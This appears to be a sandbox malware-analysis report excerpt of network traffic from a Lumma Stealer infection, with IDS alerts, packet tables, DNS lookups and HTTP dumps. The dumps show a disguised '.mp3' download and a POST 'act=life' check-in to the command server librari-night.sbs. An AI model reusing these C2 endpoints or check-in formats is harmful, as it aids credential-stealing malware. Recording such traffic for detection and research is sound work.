                                                                                                                                      2024-11-22T05:02:21.488972+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549723172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:25.011304+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549736172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:25.011304+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549736172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:25.786239+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549736172.67.206.172443TCP
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 22, 2024 05:02:04.626348972 CET4970680192.168.2.5176.9.162.205
                                                                                                                                      Nov 22, 2024 05:02:04.746296883 CET8049706176.9.162.205192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:04.747570038 CET4970680192.168.2.5176.9.162.205
                                                                                                                                      Nov 22, 2024 05:02:04.747885942 CET4970680192.168.2.5176.9.162.205
                                                                                                                                      Nov 22, 2024 05:02:04.867670059 CET8049706176.9.162.205192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:06.126864910 CET8049706176.9.162.205192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:06.126904964 CET8049706176.9.162.205192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:06.127017021 CET4970680192.168.2.5176.9.162.205
                                                                                                                                      Nov 22, 2024 05:02:06.127017021 CET4970680192.168.2.5176.9.162.205
                                                                                                                                      Nov 22, 2024 05:02:06.139235973 CET4970680192.168.2.5176.9.162.205
                                                                                                                                      Nov 22, 2024 05:02:06.139276028 CET4970680192.168.2.5176.9.162.205
                                                                                                                                      Nov 22, 2024 05:02:06.832542896 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:06.832660913 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:06.832762003 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:06.834054947 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:06.834093094 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.103427887 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.103646040 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.107949018 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.107960939 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.108366966 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.151329041 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.151362896 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.151483059 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.832950115 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.833067894 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.833134890 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.834789991 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.834813118 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.834829092 CET49707443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.834836006 CET44349707172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.913088083 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.913196087 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:08.913280964 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.913646936 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:08.913683891 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:10.178519011 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:10.178730965 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:10.180102110 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:10.180130959 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:10.180478096 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:10.181843996 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:10.181885958 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:10.181955099 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.039880991 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.039928913 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.039968014 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.039992094 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.040018082 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.040034056 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.040064096 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.040087938 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.040132046 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.040133953 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.040144920 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.040198088 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.040226936 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.040290117 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.159632921 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.163815022 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.163887024 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.163961887 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.172157049 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.172235966 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.172244072 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.172298908 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.172440052 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.172440052 CET49708443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.172475100 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.172497988 CET44349708172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.196918011 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.196997881 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:11.197098017 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.197360039 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:11.197403908 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:12.507210016 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:12.507354021 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:12.508754969 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:12.508781910 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:12.509141922 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:12.510302067 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:12.510437012 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:12.510485888 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:13.301561117 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:13.301676989 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:13.301783085 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:13.302015066 CET49709443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:13.302054882 CET44349709172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:13.318806887 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:13.318852901 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:13.318950891 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:13.319256067 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:13.319272995 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:14.687444925 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:14.687562943 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:14.689857006 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:14.689884901 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:14.690232038 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:14.692038059 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:14.692231894 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:14.692281961 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:14.692373037 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:14.739377022 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:15.488168955 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:15.488271952 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:15.488353968 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:15.488593102 CET49710443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:15.488636017 CET44349710172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:15.584841013 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:15.584901094 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:15.584986925 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:15.585376978 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:15.585395098 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:16.846071959 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:16.846184969 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:16.847538948 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:16.847548962 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:16.848050117 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:16.849144936 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:16.849263906 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:16.849298000 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:16.849404097 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:16.849412918 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:17.709589958 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:17.709660053 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:17.709846020 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:17.709880114 CET49712443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:17.709896088 CET44349712172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:17.856755972 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:17.856842995 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:17.856997013 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:17.857362032 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:17.857398033 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:19.116422892 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:19.116597891 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:19.117868900 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:19.117923975 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:19.118180990 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:19.119437933 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:19.119606972 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:19.119621038 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:19.848876953 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:19.848964930 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:19.849025011 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:19.849204063 CET49715443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:19.849224091 CET44349715172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:20.177202940 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:20.177237988 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:20.177328110 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:20.177642107 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:20.177659988 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.483227015 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.483448982 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.485146046 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.485173941 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.485523939 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.487438917 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.488341093 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.488383055 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.488498926 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.488540888 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.488672018 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.488711119 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.488842964 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.488869905 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.489006042 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.489042997 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.489248991 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.489289999 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.489300013 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.489451885 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.489495993 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.535326958 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.535631895 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.535701990 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.535723925 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.579339981 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.579780102 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.579850912 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.579906940 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.627326012 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.627700090 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:21.675357103 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:21.850239038 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:23.792794943 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:23.792915106 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:23.793080091 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:23.793080091 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:23.797220945 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:23.797264099 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:23.797353983 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:23.797632933 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:23.797656059 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:24.095524073 CET49723443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:24.095549107 CET44349723172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.011199951 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.011303902 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:25.012542963 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:25.012552023 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.012878895 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.024502993 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:25.024523973 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:25.024591923 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.786241055 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.786362886 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.786613941 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:25.786726952 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:25.786773920 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:25.786803961 CET49736443192.168.2.5172.67.206.172
                                                                                                                                      Nov 22, 2024 05:02:25.786819935 CET44349736172.67.206.172192.168.2.5
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 22, 2024 05:02:04.324063063 CET5456953192.168.2.51.1.1.1
                                                                                                                                      Nov 22, 2024 05:02:04.616609097 CET53545691.1.1.1192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:06.219890118 CET6312353192.168.2.51.1.1.1
                                                                                                                                      Nov 22, 2024 05:02:06.448358059 CET53631231.1.1.1192.168.2.5
                                                                                                                                      Nov 22, 2024 05:02:06.453677893 CET4981753192.168.2.51.1.1.1
                                                                                                                                      Nov 22, 2024 05:02:06.807097912 CET53498171.1.1.1192.168.2.5
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Nov 22, 2024 05:02:04.324063063 CET192.168.2.51.1.1.10x7297Standard query (0)joxi.netA (IP address)IN (0x0001)false
                                                                                                                                      Nov 22, 2024 05:02:06.219890118 CET192.168.2.51.1.1.10x10e2Standard query (0)processhol.sbsA (IP address)IN (0x0001)false
                                                                                                                                      Nov 22, 2024 05:02:06.453677893 CET192.168.2.51.1.1.10xf5c2Standard query (0)librari-night.sbsA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Nov 22, 2024 05:02:04.616609097 CET1.1.1.1192.168.2.50x7297No error (0)joxi.net176.9.162.205A (IP address)IN (0x0001)false
                                                                                                                                      Nov 22, 2024 05:02:04.616609097 CET1.1.1.1192.168.2.50x7297No error (0)joxi.net78.47.21.153A (IP address)IN (0x0001)false
                                                                                                                                      Nov 22, 2024 05:02:06.448358059 CET1.1.1.1192.168.2.50x10e2Name error (3)processhol.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Nov 22, 2024 05:02:06.807097912 CET1.1.1.1192.168.2.50xf5c2No error (0)librari-night.sbs172.67.206.172A (IP address)IN (0x0001)false
                                                                                                                                      Nov 22, 2024 05:02:06.807097912 CET1.1.1.1192.168.2.50xf5c2No error (0)librari-night.sbs104.21.85.146A (IP address)IN (0x0001)false
                                                                                                                                      • librari-night.sbs
                                                                                                                                      • joxi.net
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.549706176.9.162.205801352C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 22, 2024 05:02:04.747885942 CET285OUTGET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                      Host: joxi.net
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 22, 2024 05:02:06.126864910 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Set-Cookie: js=Kjb%2CqXNGWr6qO8OFFfuytA6GbIwRASKgxwp%2CaVFODg3IF0lCGlL3T5hb1EBsxkeemPHDsfJFog2LUGk4F%2C0iJ0; path=/
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:05 GMT
                                                                                                                                      Vary: Accept-Language
                                                                                                                                      Vary: Accept-Language
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d [TRUNCATED]
                                                                                                                                      Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b#3][xg(i^f%a{T*}+;$Lh~~|:Qc5,? |/0`)_;RG:Ej:|n?q/5gy:0a.9}8M|K9AW"o!/oD44'TJk0sw Sw1P!rs8XDY!+ZY9q!y$}p{ym-_~h6{[uFxMi&Ecx==N$[n),&TkyjSXoI)7[-Q+uARerF;95~VX='cW5^F2)\@F*Afc6,-0N\D~:CR@k33'zxz&<RBX[=NYVJZpVdgb5ZQXZ+cuw_oNA`J$k N9oN5hj4R';;E}y:S.TDZ;LP4&V 18|wKY(0t;!5+{}D?a0\K2'
                                                                                                                                      Nov 22, 2024 05:02:06.126904964 CET9INData Raw: 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.549707172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:08 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-22 04:02:08 UTC1023INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:08 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=4basnmdoabkadhci93umbut3a6; expires=Mon, 17-Mar-2025 21:48:47 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IZ9%2BPJCyo5W3qlMMN9c998f5SBr6mdy9t%2BwBwpcmRsNbqSGqT3mdDTfz5CgFkLxsX7lfnmb7rkiq6rmcGEsVm%2F%2BaxDY2kWJ6L1ah%2Bwr1a%2B6BR877mHl7LHmC8%2Bp9ySwhYJDUbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e6605b25fd24283-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
